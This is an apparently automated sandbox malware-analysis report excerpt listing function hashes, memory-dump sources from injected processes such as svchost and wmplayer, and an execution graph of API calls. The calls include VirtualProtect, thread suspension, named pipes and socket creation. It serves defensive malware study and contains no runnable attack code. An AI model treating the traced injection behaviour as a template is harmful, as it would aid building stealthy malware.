                                                                                                                                                                                                                                                                                                          Function 00007DF426A940EC Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 726b9f7e1999859a4f95099476a86d4c13b7fad6a8aedaae967c0234dbe0bfc0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD05E3060BD0B0BEF9CABEA48A963536E0DF69352720003E940BC1591CA19C851D314
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC1200 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: a879d9cdda192066d0016720bfe52cb777deb1a8d88bb757dd441a7a6a3c5b79
                                                                                                                                                                                                                                                                                                          • Instruction ID: bb29cabb62062424e782dd6be97452204e0611a834de42c64549d7ef995f64be
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a879d9cdda192066d0016720bfe52cb777deb1a8d88bb757dd441a7a6a3c5b79
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EB01238D5FC9B07EE6C33760D6D0553560EFB6212FC401B5DC16C0050F50CC4944352

                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                          Function 000001C27831F5A0 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, Offset: 000001C2782E0000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_1c2782e0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 190237d2ffd9b392b33fbad128f10d8922b8ecb4362975056822984983953748
                                                                                                                                                                                                                                                                                                          • Instruction ID: c4baaa42edf10a998ba58b7de34015d84c5a7ad241ce47b62ca994584c44897e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 190237d2ffd9b392b33fbad128f10d8922b8ecb4362975056822984983953748
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921A83674AB5447FB9A8B2DD4D4BF872905768B88F149050DE4973FD6D7BEC450C200
                                                                                                                                                                                                                                                                                                          Function 00007DF426AC1741 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:3.5%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:28.8%
                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:326
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:32
                                                                                                                                                                                                                                                                                                          execution_graph 38390 7df4f81d44a0 38391 7df4f81d44bd 38390->38391 38397 7df4f81d4594 38391->38397 38398 7df4f81d1d34 38391->38398 38395 7df4f81d44f7 38396 7df4f81d4562 calloc 38395->38396 38395->38397 38396->38397 38399 7df4f81d1d41 38398->38399 38400 7df4f81d1d67 38398->38400 38399->38400 38401 7df4f81d1d47 RtlAddFunctionTable 38399->38401 38402 7df4f81d1d6c 38400->38402 38401->38400 38403 7df4f81d1d8c VirtualProtect 38402->38403 38404 7df4f81d1d9b 38402->38404 38403->38404 38405 7df4f81d1e39 38404->38405 38406 7df4f81d1e15 VirtualProtect 38404->38406 38405->38395 38406->38404 38407 21ab2fd5918 38410 21ab2fd6c68 38407->38410 38409 21ab2fd592a 38411 21ab2fd6c71 38410->38411 38418 21ab2fd6d54 38410->38418 38411->38418 38421 21ab2fe3218 38411->38421 38413 21ab2fd6d06 38413->38418 38429 21ab2fd3c88 38413->38429 38415 21ab2fd6d12 38416 21ab2fd6d29 SetErrorMode 38415->38416 38417 21ab2fd6d42 38416->38417 38420 21ab2fd6d6c 38416->38420 38417->38418 38433 21ab2fd69ec 38417->38433 38418->38409 38420->38409 38426 21ab2fe3265 38421->38426 38422 21ab2fe42a6 38422->38413 38423 21ab2fe3d5a RtlFormatCurrentUserKeyPath 38424 21ab2fe3d66 38423->38424 38424->38422 38425 21ab2fe3eab calloc 38424->38425 38425->38422 38427 21ab2fe3ed1 38425->38427 38426->38422 38426->38423 38426->38424 38427->38422 38449 21ab2fd563c 6 API calls 38427->38449 38430 21ab2fd3c95 38429->38430 38431 21ab2fd3cbb 38429->38431 38430->38431 38432 21ab2fd3c9b RtlAddFunctionTable 38430->38432 38431->38415 38432->38431 38434 21ab2fd69f5 38433->38434 38448 21ab2fd6a68 38433->38448 38435 21ab2fd6acd 38434->38435 38436 21ab2fd6a21 38434->38436 38473 21ab2fe105c 15 API calls 38435->38473 38438 21ab2fd6a99 38436->38438 38439 21ab2fd6a3d 38436->38439 38436->38448 38472 21ab2fe16c8 12 API calls 38438->38472 38441 21ab2fd6a42 38439->38441 38442 21ab2fd6a8c 38439->38442 38443 21ab2fd6a77 38441->38443 38444 21ab2fd6a47 38441->38444 38471 21ab2fe1188 15 API calls 38442->38471 38470 21ab2fe12bc 18 API calls 38443->38470 38444->38448 38450 21ab2fdd7c0 38444->38450 38448->38418 38449->38422 38451 21ab2fdd7e0 38450->38451 38452 21ab2fdd85f CloseHandle 38451->38452 38453 21ab2fdd7fb MapViewOfFile 38451->38453 38454 21ab2fdd871 38452->38454 38455 21ab2fdd92b 38452->38455 38460 21ab2fdd825 38453->38460 38454->38455 38474 21ab2fd2b54 38454->38474 38495 21ab2fda9d4 38455->38495 38459 21ab2fdd881 38459->38455 38478 21ab2fde2a8 38459->38478 38460->38452 38464 21ab2fdd893 38487 21ab2fdd3b4 6 API calls 38464->38487 38466 21ab2fdd898 38488 21ab2fd79a0 38466->38488 38468 21ab2fdd8e7 38494 21ab2fd2ba8 6 API calls 38468->38494 38470->38448 38471->38448 38472->38448 38473->38448 38475 21ab2fd2b64 38474->38475 38476 21ab2fd2b6d HeapCreate 38475->38476 38477 21ab2fd2b86 38475->38477 38476->38477 38477->38459 38479 21ab2fde2c0 38478->38479 38480 21ab2fde30a 38479->38480 38498 21ab2fd2c24 38479->38498 38482 21ab2fde317 VirtualProtect 38480->38482 38483 21ab2fdd88e 38480->38483 38502 21ab2fd1000 38482->38502 38486 21ab2fde1dc GetSystemInfo VirtualAlloc 38483->38486 38485 21ab2fde344 VirtualProtect 38485->38483 38486->38464 38487->38466 38491 21ab2fd79ce 38488->38491 38489 21ab2fd7c40 38489->38468 38490 21ab2fda9d4 free 38490->38489 38491->38489 38493 21ab2fd7b8e 38491->38493 38511 21ab2fd77dc 38491->38511 38493->38490 38494->38455 38496 21ab2fda9e7 free 38495->38496 38497 21ab2fda9f8 38495->38497 38496->38496 38496->38497 38497->38448 38499 21ab2fd2c52 38498->38499 38501 21ab2fd2cbc 38499->38501 38504 21ab2fd24c4 38499->38504 38501->38480 38503 21ab2fd100c 38502->38503 38503->38485 38507 21ab2fd22d4 GetSystemInfo 38504->38507 38508 21ab2fd2305 38507->38508 38509 21ab2fd23a4 VirtualAlloc 38508->38509 38510 21ab2fd23cf 38508->38510 38509->38508 38509->38510 38510->38501 38512 21ab2fd7804 38511->38512 38519 21ab2fe3158 38512->38519 38514 21ab2fd782d 38516 21ab2fd7879 38514->38516 38523 21ab2fe2ec8 38514->38523 38517 21ab2fd78bb GetVolumeInformationW 38516->38517 38518 21ab2fd790c 38516->38518 38517->38518 38518->38493 38520 21ab2fe317b 38519->38520 38522 21ab2fe3173 38519->38522 38521 21ab2fe31dc NtAcceptConnectPort 38520->38521 38520->38522 38521->38522 38522->38514 38524 21ab2fe2f11 38523->38524 38525 21ab2fe2f67 NtAcceptConnectPort 38524->38525 38526 21ab2fe2f1b 38524->38526 38525->38526 38526->38516 38531 7df4f81b25d4 NtQuerySystemInformation 38532 7df4f81b25fd 38531->38532 38533 7df4f81b25f7 free 38531->38533 38534 7df4f81b2613 NtQuerySystemInformation 38532->38534 38535 7df4f81b262f 38532->38535 38533->38532 38534->38535 38536 21ab2fd698c 38537 21ab2fd69a6 38536->38537 38538 21ab2fd69b0 38537->38538 38539 21ab2fd69ab LoadLibraryA 38537->38539 38539->38538 38540 7df4f8203cb0 38541 7df4f8203cc7 38540->38541 38544 7df4f8202f48 38541->38544 38543 7df4f8203cd5 38545 7df4f8202f6a 38544->38545 38547 7df4f8202f87 38545->38547 38548 7df4f8202e90 NtQuerySystemInformation 38545->38548 38547->38543 38549 7df4f8202eb3 38548->38549 38550 7df4f8202eb9 malloc 38548->38550 38549->38550 38551 7df4f8202eeb 38550->38551 38552 7df4f8202ecf NtQuerySystemInformation 38550->38552 38551->38547 38552->38551 38553 21ab2fd2908 38554 21ab2fd295b 38553->38554 38555 21ab2fd291a 38553->38555 38555->38554 38556 21ab2fd293d ResumeThread 38555->38556 38556->38555 38557 21ab2fdd004 38558 21ab2fdd057 38557->38558 38565 21ab2fdaef0 38558->38565 38560 21ab2fdd07f CreateNamedPipeW 38561 21ab2fdd0c7 38560->38561 38564 21ab2fdd109 38560->38564 38562 21ab2fdd0e0 BindIoCompletionCallback 38561->38562 38563 21ab2fdd0f8 ConnectNamedPipe 38562->38563 38562->38564 38563->38564 38566 21ab2fdaf2c 38565->38566 38569 21ab2fe2e84 38566->38569 38568 21ab2fdaf34 38568->38560 38570 21ab2fe2e98 NtAcceptConnectPort 38569->38570 38571 21ab2fe2eb2 38569->38571 38570->38571 38571->38568 38572 21ab2fe84c0 SetErrorMode 38573 21ab2fe84d4 38572->38573 38574 21ab2feb936 socket 38573->38574 38575 21ab2feb9c3 socket 38574->38575 38576 21ab2feb97a getsockopt 38574->38576 38578 21ab2feb9e3 38575->38578 38576->38575 38579 21ab2fe2d80 38580 21ab2fe2d90 NtAcceptConnectPort 38579->38580 38581 21ab2fe2d9f 38579->38581 38580->38581 38582 21ab30135f4 38583 21ab3013612 malloc 38582->38583 38584 21ab301362c 38582->38584 38583->38584 38585 7df4f81b34a8 38586 7df4f81b34be 38585->38586 38588 7df4f81b352f 38585->38588 38587 7df4f81b34fe SetWinEventHook 38586->38587 38586->38588 38587->38588 38589 21ab2fd69b8 38590 21ab2fd69d4 38589->38590 38591 21ab2fd69d9 GetProcAddressForCaller 38590->38591 38592 21ab2fd69e2 38590->38592 38591->38592 38593 21ab2fd2978 38594 21ab2fd29a6 VirtualProtect 38593->38594 38595 21ab2fd299e 38593->38595 38597 21ab2fd29cb 38594->38597 38598 21ab2fd29c1 38594->38598 38595->38594 38596 21ab2fd2a0d VirtualProtect 38596->38598 38597->38596 38599 21ab2fdbef0 38600 21ab2fdbf19 38599->38600 38601 21ab2fdbf47 LoadLibraryA 38600->38601 38602 21ab2fdbf29 38600->38602 38601->38602 38603 21ab2fd74f0 38606 21ab2fd7528 38603->38606 38604 21ab2fd7782 38605 21ab2fd75c3 VirtualFree 38605->38606 38606->38604 38606->38605 38607 7df4f8208c38 SetErrorMode 38608 7df4f8208c4c 38607->38608 38609 7df4f820c8f2 socket 38608->38609 38610 7df4f820c936 closesocket 38609->38610 38611 7df4f820c981 38609->38611 38613 7df4f820c987 socket 38610->38613 38611->38613 38614 7df4f820c99f 38613->38614 38615 7df4f81b47b8 38616 7df4f81b47ee 38615->38616 38617 7df4f81b4b08 38616->38617 38627 7df4f81b1708 38616->38627 38621 7df4f81b4909 calloc 38623 7df4f81b482b 38621->38623 38625 7df4f81b4a12 38621->38625 38622 7df4f81b4958 38624 7df4f81b49e3 SendMessageA 38622->38624 38623->38617 38623->38621 38623->38622 38624->38625 38636 7df4f81b2730 NtQuerySystemInformation free NtQuerySystemInformation 38625->38636 38628 7df4f81b1715 38627->38628 38629 7df4f81b173b 38627->38629 38628->38629 38630 7df4f81b171b RtlAddFunctionTable 38628->38630 38631 7df4f81b1740 38629->38631 38630->38629 38632 7df4f81b176f 38631->38632 38633 7df4f81b1760 VirtualProtect 38631->38633 38634 7df4f81b180d 38632->38634 38635 7df4f81b17e9 VirtualProtect 38632->38635 38633->38632 38634->38623 38635->38632 38637 21ab2fd262c 38638 21ab2fd265f 38637->38638 38640 21ab2fd2680 Thread32First 38638->38640 38644 21ab2fd2738 38638->38644 38639 21ab2fd288e 38643 21ab2fd2685 38640->38643 38641 21ab2fd2771 SuspendThread 38641->38644 38642 21ab2fd272f CloseHandle 38642->38644 38643->38642 38644->38639 38644->38641 38645 7df4f81a22cc 38647 7df4f81a22ee 38645->38647 38646 7df4f81a276d 38647->38646 38653 7df4f81a1290 38647->38653 38651 7df4f81a2329 38651->38646 38652 7df4f81a2754 SetTimer 38651->38652 38652->38646 38654 7df4f81a129d 38653->38654 38655 7df4f81a12c3 38653->38655 38654->38655 38656 7df4f81a12a3 RtlAddFunctionTable 38654->38656 38657 7df4f81a12c8 38655->38657 38656->38655 38658 7df4f81a12f7 38657->38658 38659 7df4f81a12e8 VirtualProtect 38657->38659 38660 7df4f81a1395 38658->38660 38661 7df4f81a1371 VirtualProtect 38658->38661 38659->38658 38660->38651 38661->38658 38662 7df4f8204290 38664 7df4f82042c3 38662->38664 38663 7df4f82044c0 38664->38663 38673 7df4f8201708 38664->38673 38668 7df4f82042fe 38668->38663 38669 7df4f8204453 38668->38669 38671 7df4f82043f0 calloc 38668->38671 38682 7df4f82031bc free 38668->38682 38670 7df4f820449b SendMessageA 38669->38670 38670->38663 38671->38668 38674 7df4f820173b 38673->38674 38675 7df4f8201715 38673->38675 38677 7df4f8201740 38674->38677 38675->38674 38676 7df4f820171b RtlAddFunctionTable 38675->38676 38676->38674 38678 7df4f8201760 VirtualProtect 38677->38678 38680 7df4f820176f 38677->38680 38678->38680 38679 7df4f820180d 38679->38668 38680->38679 38681 7df4f82017e9 VirtualProtect 38680->38681 38681->38680 38682->38668 38683 21ab2fdbc28 38684 21ab2fdbc2d 38683->38684 38686 21ab2fdbc56 38683->38686 38687 21ab2fdba4c 38684->38687 38688 21ab2fdba6d 38687->38688 38689 21ab2fdbb44 CreateWindowExW 38688->38689 38690 21ab2fdbba1 38688->38690 38689->38690 38690->38686 38691 7df4f821063c 38692 7df4f821064e 38691->38692 38693 7df4f8210655 38691->38693 38693->38692 38694 7df4f821068e free 38693->38694 38694->38692 38695 21ab2fdcee0 38696 21ab2fdcef3 38695->38696 38700 21ab2fdcf49 38695->38700 38701 21ab2fda7e0 38696->38701 38698 21ab2fdcf05 38699 21ab2fdcf28 ReadFile 38698->38699 38699->38700 38702 21ab2fda847 38701->38702 38703 21ab2fda800 38701->38703 38702->38698 38703->38702 38704 21ab2fda86b malloc 38703->38704 38704->38702 38705 21ab2fdcc9c 38706 21ab2fdccba 38705->38706 38719 21ab2fdcd34 38705->38719 38707 21ab2fdcce0 38706->38707 38708 21ab2fdce5f 38706->38708 38706->38719 38709 21ab2fdce2e 38707->38709 38713 21ab2fdccf7 38707->38713 38710 21ab2fda7e0 malloc 38708->38710 38711 21ab2fda7e0 malloc 38709->38711 38712 21ab2fdce42 38710->38712 38711->38712 38716 21ab2fdce93 ReadFile 38712->38716 38714 21ab2fdcded 38713->38714 38715 21ab2fdcd2b 38713->38715 38713->38719 38732 21ab2fdbc64 38714->38732 38715->38719 38720 21ab2fdc994 38715->38720 38716->38719 38721 21ab2fdcc66 38720->38721 38731 21ab2fdc9ce 38720->38731 38721->38719 38722 21ab2fdcc4f 38723 21ab2fda9d4 free 38722->38723 38723->38721 38724 21ab2fdcbca 38724->38722 38746 21ab2fdc2d0 38724->38746 38726 21ab2fdcbc2 38751 21ab2fee398 free free 38726->38751 38731->38721 38731->38724 38731->38726 38739 21ab2fee7e8 free free 38731->38739 38740 21ab2fedbcc 38731->38740 38750 21ab2fed730 malloc 38731->38750 38733 21ab2fdbc92 38732->38733 38734 21ab2fdbd60 38732->38734 38733->38734 38735 21ab2fdbcb5 OpenFileMappingW 38733->38735 38734->38719 38735->38734 38736 21ab2fdbcd2 MapViewOfFile 38735->38736 38737 21ab2fdbd57 CloseHandle 38736->38737 38738 21ab2fdbcf0 38736->38738 38737->38734 38738->38737 38739->38731 38741 21ab2fedbde 38740->38741 38742 21ab2fedbe5 38740->38742 38741->38731 38742->38741 38743 21ab2fedc24 38742->38743 38744 21ab2fedc1e free 38742->38744 38743->38741 38752 21ab3014c3c 38743->38752 38744->38743 38747 21ab2fdc313 38746->38747 38749 21ab2fdc87a 38746->38749 38748 21ab2fdc7c0 VirtualAlloc 38747->38748 38747->38749 38748->38749 38749->38722 38750->38731 38751->38724 38753 21ab3014c4a 38752->38753 38754 21ab3014c6c 38752->38754 38753->38754 38755 21ab3014c65 free 38753->38755 38754->38741 38755->38754 38756 21ab2fd515c 38769 21ab2fe2a20 38756->38769 38758 21ab2fd5374 38759 21ab2fd51b5 38759->38758 38760 21ab2fd5367 38759->38760 38772 21ab2fe2dac 38759->38772 38781 21ab2fe290c 38760->38781 38767 21ab2fe2dac NtAcceptConnectPort 38768 21ab2fd52f2 38767->38768 38778 21ab2fe2ddc 38768->38778 38770 21ab2fe2a45 38769->38770 38771 21ab2fe2a30 NtAcceptConnectPort 38769->38771 38770->38759 38771->38770 38773 21ab2fd5244 38772->38773 38774 21ab2fe2dbc NtAcceptConnectPort 38772->38774 38773->38760 38775 21ab2fe2cac 38773->38775 38774->38773 38776 21ab2fe2cbf NtAcceptConnectPort 38775->38776 38777 21ab2fd5290 38775->38777 38776->38777 38777->38767 38777->38768 38779 21ab2fe2df0 38778->38779 38780 21ab2fe2dec NtAcceptConnectPort 38778->38780 38779->38760 38780->38779 38782 21ab2fe2920 38781->38782 38783 21ab2fe291c NtAcceptConnectPort 38781->38783 38782->38758 38783->38782

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A1958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000003.2166351595.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_3_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                                                                                                                                                                                                          • String ID: H$H
                                                                                                                                                                                                                                                                                                          • API String ID: 874015164-136785262
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 733f9d242d84350ec482b170d0dc0851649cc193ca1a5017b9f1424b40398fe9
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66B12F7060CB888BD764DF18D885AAAB7E5FFD5310F404A2EE58FC3251DA34E545CB86
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FE3218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 0 21ab2fe3218-21ab2fe3274 call 21ab2fd49e4 3 21ab2fe327a-21ab2fe32db call 21ab2fd6dfc * 3 call 21ab2fd32fc call 21ab2fd6dfc 0->3 4 21ab2fe42bb-21ab2fe42e1 call 21ab2fe49f0 0->4 18 21ab2fe42a8-21ab2fe42a9 3->18 19 21ab2fe32e1-21ab2fe3bf4 3->19 22 21ab2fe42ad-21ab2fe42b6 call 21ab2fd4a40 18->22 20 21ab2fe3d49-21ab2fe3d51 19->20 21 21ab2fe3bfa-21ab2fe3c05 19->21 23 21ab2fe3dc4-21ab2fe3dd5 20->23 24 21ab2fe3d53-21ab2fe3d58 20->24 21->20 25 21ab2fe3c0b-21ab2fe3c19 21->25 22->4 31 21ab2fe3dd7-21ab2fe3def 23->31 32 21ab2fe3e2e-21ab2fe3e34 23->32 24->23 27 21ab2fe3d5a-21ab2fe3d64 RtlFormatCurrentUserKeyPath 24->27 28 21ab2fe3d44-21ab2fe3d45 25->28 29 21ab2fe3c1f-21ab2fe3c27 25->29 27->23 33 21ab2fe3d66-21ab2fe3d77 27->33 28->20 29->28 34 21ab2fe3c2d-21ab2fe3c45 29->34 31->32 43 21ab2fe3df1-21ab2fe3df9 31->43 35 21ab2fe3e36-21ab2fe3e37 32->35 36 21ab2fe3e5f-21ab2fe3e72 32->36 38 21ab2fe3d79-21ab2fe3d85 33->38 39 21ab2fe3d92-21ab2fe3d9a 33->39 40 21ab2fe3d38-21ab2fe3d3c 34->40 41 21ab2fe3c4b-21ab2fe3c4c 34->41 42 21ab2fe3e39-21ab2fe3e58 35->42 36->18 54 21ab2fe3e78-21ab2fe3e83 36->54 56 21ab2fe3d87-21ab2fe3d90 38->56 57 21ab2fe3dbb-21ab2fe3dbc 38->57 44 21ab2fe3d9c-21ab2fe3db8 call 21ab2fd1000 39->44 48 21ab2fe3d3e-21ab2fe3d3f 40->48 45 21ab2fe3c4f-21ab2fe3c5f 41->45 42->42 46 21ab2fe3e5a-21ab2fe3e5b 42->46 49 21ab2fe3e0b 43->49 50 21ab2fe3dfb-21ab2fe3e09 43->50 44->57 53 21ab2fe3c71-21ab2fe3c73 45->53 46->36 48->28 49->32 55 21ab2fe3e0d-21ab2fe3e28 49->55 50->32 59 21ab2fe3c75-21ab2fe3c7a 53->59 60 21ab2fe3c61-21ab2fe3c6f 53->60 54->18 61 21ab2fe3e89-21ab2fe3e97 54->61 55->32 56->44 57->23 62 21ab2fe3d05-21ab2fe3d08 59->62 63 21ab2fe3c80 59->63 60->53 61->18 64 21ab2fe3e9d-21ab2fe3ea5 61->64 65 21ab2fe3d15-21ab2fe3d24 62->65 66 21ab2fe3d0a-21ab2fe3d0e 62->66 67 21ab2fe3c82-21ab2fe3c89 63->67 64->18 68 21ab2fe3eab-21ab2fe3ecb calloc 64->68 65->45 71 21ab2fe3d2a-21ab2fe3d36 65->71 66->65 70 21ab2fe3d10-21ab2fe3d11 66->70 72 21ab2fe3ca3-21ab2fe3ccf 67->72 73 21ab2fe3c8b-21ab2fe3c9f 67->73 68->18 69 21ab2fe3ed1-21ab2fe3ef5 68->69 74 21ab2fe4014-21ab2fe404f 69->74 75 21ab2fe3efb-21ab2fe3f0e 69->75 70->65 71->48 76 21ab2fe3cf7-21ab2fe3cf8 72->76 77 21ab2fe3cd1-21ab2fe3ce5 call 21ab2fe4a1c 72->77 73->67 78 21ab2fe3ca1 73->78 89 21ab2fe40a7-21ab2fe40b7 74->89 90 21ab2fe4051-21ab2fe4052 74->90 79 21ab2fe3f10-21ab2fe3f1a 75->79 81 21ab2fe3cfd-21ab2fe3cfe 76->81 77->76 88 21ab2fe3ce7-21ab2fe3cf5 77->88 78->62 82 21ab2fe3fe5-21ab2fe3ff7 79->82 83 21ab2fe3f20-21ab2fe3f24 79->83 81->62 82->79 86 21ab2fe3ffd-21ab2fe4012 82->86 83->82 87 21ab2fe3f2a-21ab2fe3f74 call 21ab2fe4a30 83->87 86->74 99 21ab2fe3f88-21ab2fe3f8a 87->99 88->81 89->18 98 21ab2fe40bd-21ab2fe40d3 89->98 92 21ab2fe4054-21ab2fe405c 90->92 95 21ab2fe4089-21ab2fe409d 92->95 96 21ab2fe405e-21ab2fe4063 92->96 95->92 97 21ab2fe409f-21ab2fe40a0 95->97 96->95 100 21ab2fe4065-21ab2fe406e 96->100 97->89 101 21ab2fe4149-21ab2fe414f 98->101 102 21ab2fe40d5-21ab2fe40d6 98->102 103 21ab2fe3f76-21ab2fe3f86 99->103 104 21ab2fe3f8c-21ab2fe3fa2 99->104 105 21ab2fe4071-21ab2fe4074 100->105 106 21ab2fe41a2-21ab2fe41a9 101->106 107 21ab2fe4151-21ab2fe4155 101->107 108 21ab2fe40d8-21ab2fe40e3 102->108 103->99 109 21ab2fe3fa4-21ab2fe3fac 104->109 110 21ab2fe3fe1 104->110 111 21ab2fe4076 105->111 112 21ab2fe407d-21ab2fe4087 105->112 116 21ab2fe4256-21ab2fe4258 106->116 117 21ab2fe41af-21ab2fe41cf call 21ab2fd32fc 106->117 113 21ab2fe415c-21ab2fe4167 107->113 114 21ab2fe40f4-21ab2fe4108 108->114 115 21ab2fe40e5-21ab2fe40f2 108->115 109->110 118 21ab2fe3fae 109->118 110->82 111->112 112->95 112->105 119 21ab2fe4189-21ab2fe41a0 113->119 120 21ab2fe4169-21ab2fe4175 113->120 114->101 121 21ab2fe410a 114->121 115->114 134 21ab2fe410c-21ab2fe411b 115->134 124 21ab2fe4284-21ab2fe428d 116->124 125 21ab2fe425a-21ab2fe4264 116->125 135 21ab2fe41e4-21ab2fe41f8 call 21ab2fd32fc 117->135 136 21ab2fe41d1-21ab2fe41e2 call 21ab2fd35b8 117->136 123 21ab2fe3fb0-21ab2fe3fc9 call 21ab2fe4a1c 118->123 119->106 119->113 120->119 127 21ab2fe4177-21ab2fe417e 120->127 121->108 143 21ab2fe3fd5-21ab2fe3fdb 123->143 144 21ab2fe3fcb-21ab2fe3fd1 123->144 124->22 126 21ab2fe428f-21ab2fe42a6 call 21ab2fd6e0c call 21ab2fd563c 124->126 125->124 131 21ab2fe4266-21ab2fe4280 125->131 126->22 127->119 133 21ab2fe4180-21ab2fe4187 127->133 131->124 133->119 140 21ab2fe413c 134->140 141 21ab2fe411d-21ab2fe413a 134->141 135->116 151 21ab2fe41fa-21ab2fe420b call 21ab2fd35b8 135->151 136->135 150 21ab2fe420d-21ab2fe4223 call 21ab2fe2804 136->150 146 21ab2fe4141-21ab2fe4143 140->146 141->146 143->110 144->123 145 21ab2fe3fd3 144->145 145->110 146->101 146->124 150->116 158 21ab2fe4225-21ab2fe4235 150->158 151->116 151->150 158->116 160 21ab2fe4237-21ab2fe4250 